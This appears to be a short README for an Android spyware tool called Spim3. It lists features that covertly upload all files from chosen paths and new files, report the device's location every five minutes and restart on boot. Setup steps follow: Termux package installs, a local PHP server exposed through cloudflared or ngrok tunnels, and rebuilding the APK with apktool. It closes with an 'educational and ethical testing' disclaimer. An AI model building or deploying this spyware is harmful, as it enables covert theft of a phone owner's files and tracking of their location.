Simple Android spyware that uploads all files from user selected paths.
- Upload all files from given path.
- Upload also newly created files.
- Send location every 5 minutes.
- Persistent, auto start on boot.
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone
cd Spim3/
- open new session
cd Files/
php -S > /dev/null 2>&1 &
- Tunnel using cloudflared
cloudflared tunnel --url
- Tunnel using ngrok
ngrok http 8080
- on main session:
- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
This tool/program is designed for educational and ethical testing purposes only, The author strictly prohibits the use of this tool/program for any unauthorized or malicious activities. By using this tool, you agree that you are responsible for your actions and compliance with applicable laws and regulations. The author disclaims any liability for damages or legal consequences resulting from misuse. Use responsibly and ethically.